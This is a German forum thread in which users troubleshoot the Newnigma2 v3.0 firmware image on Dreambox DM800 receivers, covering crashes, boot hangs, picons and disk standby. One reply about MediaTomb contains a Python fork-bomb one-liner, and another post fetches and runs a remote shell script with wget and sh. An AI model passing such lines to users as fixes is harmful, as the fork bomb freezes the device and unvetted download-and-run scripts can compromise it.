DM800: Newnigma2 v3.0

• Original von Xeonking
      hallo, kann es sein das sich z.b die plugins genuine.media-scanner und modem nicht de-installieren lassen?

ist von DMM so gewollt.
      modem kannst du per telnet de-installen:

opkg remove task-opendreambox-modem enigma2-plugin-extensions-modem ppp kernel-module-ppp-async kernel-module-crc-ccitt kernel-module-ppp-deflate kernel-module-ppp-generic kernel-module-slhc dreambox-modem-ppp-scripts

danach reboot
    • Original von RoCkHoUnD
      Hallo

Hab 3.0 installiert , als Plugins hab ich Fritzcall, Inadyn, Weather Plugin drauf.

Settings mit configsaver zurückgespielt.

Ich bekomme nach ein paar Minuten TV schauen einen Crash.
      Crashlog hab ich angehangen

Das crasht der C++-Teil. Und im ersten Log steht was von Memory Error.
      Ich würde nochmal neu flashen.
      Gruß
      Dumbo

In einer irrsinnigen Welt vernünftig sein zu wollen, ist schon wieder ein Irrsinn für sich.
    • Moin Moin hab das Image mal getestet 3 Sachen,
      1. Smargo wird von CCCam nicht mehr erkannt. ;( ?(
      2. Sbox erkennt den internen Kartenleser nicht mehr.
      3. Im Plug in Menü wird keine Online Liste erstellt Meldung kommt ( keine Akteulen Plug ins)
      Welche Ursachen hat das, unter 2.8.4 läuft das ohne Probleme, bin erst mal wieder zurück gegangen aber das neue Image siecht schon Tool, aus wen ihr mal einen Tipp habt, wäre echt super würde halt doch lieber das neue drauf haben.
      :D :D

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von 1.8T ()

• Original von Dumbo
      Original von RoCkHoUnD
      Hallo

Hab 3.0 installiert , als Plugins hab ich Fritzcall, Inadyn, Weather Plugin drauf.

Settings mit configsaver zurückgespielt.

Ich bekomme nach ein paar Minuten TV schauen einen Crash.
      Crashlog hab ich angehangen

Das crasht der C++-Teil. Und im ersten Log steht was von Memory Error.
      Ich würde nochmal neu flashen.

Hmm ich schau jetzt gerade RTL jetzt scheint es zu gehen , vorhin bei den Crashs hab ich RTL HD geschaut.

Aber ich flashe nochmal neu.
      Gruss
      RoCkHoUnD

----------------------------------------------------------------------

Dreambox 800 HD se Newnigma 4.0.16
    • Original von arianebox
      Original von Xeonking
      hallo, kann es sein das sich z.b die plugins genuine.media-scanner und modem nicht de-installieren lassen?

ist von DMM so gewollt.
      modem kannst du per telnet de-installen:

opkg remove task-opendreambox-modem enigma2-plugin-extensions-modem ppp kernel-module-ppp-async kernel-module-crc-ccitt kernel-module-ppp-deflate kernel-module-ppp-generic kernel-module-slhc dreambox-modem-ppp-scripts

danach reboot

danke danke, heißt also das man das genuine und diesen media-scanner nicht per telnet entfernen kann?

MFG XeonKing©!!!
    • btw. ich hatte nun auch das boot problem, nachdem ich das erste mal nach der einrichtung neugestartet habe. ich habe etwa 5x neugeflasht, dann habe ich einfach mal meine karte aus dem slot gezogen und dann hat er erfolgreich gebootet.

edit: ist auch reproduzierbar. immer wenn ich die karte im slot habe, bleibt er beim boot hängen (kabelbw)

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von DOCaCola ()

• Original von LoUiS
      Original von gino29
      mit dem unstable funktioniert mein DVBT Stick mit diesem Stable wiederrum nicht.

... und was soll diese Aussage im RELEASE Thread zum Newnigma2 3.0? Zumal wir ja auch nichts in dieser Hinsicht gemacht haben!

Ich habe das letzte unstable vom 17.05.2010 auf der Box mit dem release konnte ich dvbt Tuner nicht installieren bzw der Tuner funktionierte nicht.

Bin so vorgegangen es funktionierte nicht.

Download:
      /tmp/autoinstall.sh
      /tmp/lsusb.sh
      /usr/bin/enigma2.sh
      /usr/bin/usbtuner (tnx to angelofsky, rmie, homey

)# telnet dm800
      # wget digilander.libero.it/3ddi/autoinstall.sh -O /tmp/autoinstall.sh
      # sh /tmp/autoinstall.sh
    • Original von DOCaCola
      btw. ich hatte nun auch das boot problem, nachdem ich das erste mal nach der einrichtung neugestartet habe. ich habe etwa 5x neugeflasht, dann habe ich einfach mal meine karte aus dem slot gezogen und dann hat er erfolgreich gebootet.

edit: ist auch reproduzierbar. immer wenn ich die karte im slot habe, bleibt er beim boot hängen (kabelbw)

Müsste ich mal ausprobieren, bin auch bei KabelBW ?(

Aber nicht mehr heute Abend, sonst dreht mir meine Holde den Hals um, falls es dann doch nicht klappt... :]

MfG

Carlo
    • noch eine anmerkung zum thema boot problem mit karte im slot:
      sobald er hochgefahren ist, kann ich die karte in den slot stecken und auch die entsprechenden sender damit ansehen. keine probleme sonst soweit mit 3.0 bei mir

der hänger tritt auf kurz bevor links oben die zahnräder erscheinen sollten
    • Original von Networxx
      Hallo,

ich bin gerade wieder von NewNigma v3.0 auf NewNigma2 v2.8.4 zurückgegangen.

Und zwar habe ich in meiner DM800HD eine 2,5" Western Digital WD5000BEVT eingebaut,
      und habe jetzt einen Fehler erkannt.

Bei dem neuen NewNigma2 v3.0 Update habe ich einen Fehler entdeckt, und zwar wenn ich die DM800HD runterfahre in den Deep-Standby und das NewNigma Logo erscheint das das runterfahren abgeschlossen ist,
      und ich dann ausschalten möchte läuft meine Festplatte immer noch weiter und es gibt ein fürchterliches Geräusch der Festplatte als wenn diese in eine Notparkposition einnimmt.

Bei den NewNigma2 v2.8.4 hört man das die Festplatte am Ende des herunterfahrens abstellt und somit dieses Geräusch nicht auftritt.

Hat das sonst noch wer entdeckt?

Grüße

Networxx

ich hatte/habe genau das selbe problem mit dem image welches den "oe 1.6 kernel" nutzt und bin deshalb auf das ganz alte zurückgewechselt -- hatte eigentlich gehofft, dass sich mit dem V3 dieses problem nun löst -- kann das irgendwer bestätigen ?

gruß
    • Original von !NC
      Danke für das Update! :)

Kurze Frage zu Picons:
      Ich krieg die Skin-Picons nicht hin, die LCD-Picons funktionieren bestens. (beide auf sdb1 installiert)

Woran könnte das liegen?
      Vielleicht liegt mein Fehler daran, dass ich den Configurationssaver verwendet hab um alte Settings einzulesen?
      Im Expertenmenü hab ich natürlich sdb1 gewählt, wie gesagt, bei den Lcd-Picons klappt das.

Gruß

Hallo,
      Erst einmal vielen Dank für das neue Image.
      Ich habe das gleiche Problem , meine Picons liegen auf USB . LCD Picons funzen ,Skin Picons nicht.

Meine Picons heissen : Picon und PiconHD
      Im Vorgänger war alles ok

mfg
      terra7

Dream 920

Draem One

Dream 7080

:prost:
    • Original von clarc
      ich hatte/habe genau das selbe problem mit dem image welches den "oe 1.6 kernel" nutzt und bin deshalb auf das ganz alte zurückgewechselt -- hatte eigentlich gehofft, dass sich mit dem V3 dieses problem nun löst -- kann das irgendwer bestätigen ?

gruß

nimm mal das aktuelle unstable von heute und schaumal ob es behoben ist wir haben da was
      gefunden
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Ich musste leider auch Feststellen das meine interne Samsung nicht korrekt in den Standby geht.

Ich kann die Platte zwar manuell in den Standby schicken, aber nach kurzer Zeit läuft die Platte wieder an, egal ob Normalbetrieb oder Standby.

Kann dies an dem MediaTomb Plugin liegen? Bei dem RC2 gab es keine Probleme.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Original von linus76

ich denke in der 8k geht meine samsung 1,5 ohne probleme in den standby
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Ich versteh es auch nicht, hatte nie Probleme mit dem Standby der HDD.

Scheinbar ist es sogar überwiegend so, das wenn die Box im Standby ist das die Festplatte dann anläuft.

Ganz merkwürdig.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Original von linus76

hattest den du beim rc2 auch installiert ?
      » time to say goodbye «

Konfuzius sagt:
    • Original von linus76
      Ich musste leider auch Feststellen das meine interne Samsung nicht korrekt in den Standby geht.

Ich kann die Platte zwar manuell in den Standby schicken, aber nach kurzer Zeit läuft die Platte wieder an, egal ob Normalbetrieb oder Standby.

Haste den gestartet wenn ja wie?
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von linus76
      Ich versteh es auch nicht, hatte nie Probleme mit dem Standby der HDD.

Scheinbar ist es sogar überwiegend so, das wenn die Box im Standby ist das die Festplatte dann anläuft.

Ganz merkwürdig.

Ich hab das aktuell weder bei der 800er noch bei der 8000er. Bei beiden Boxen gehen die Platten nach der eingestellten Zeit (bei mir eine Minute) in den Standby. In beiden Boxen werkeln Samsung Platten.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Original von nixkoenner
      Original von linus76

hattest den du beim rc2 auch installiert ?

Installiert ja, aber nicht gestartet.

Habe den MediaTomb über telnet gestartet, geht ja nicht anders oder?

Wieso die Platte dann Hauptsächlich im Standby anläuft erklärt aber auch der MediaTomb nicht. Die PS3 ist ja die ganze Zeit aus.
      Dreambox 920UHD
      2x Dreambox 7020HD

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von linus76 ()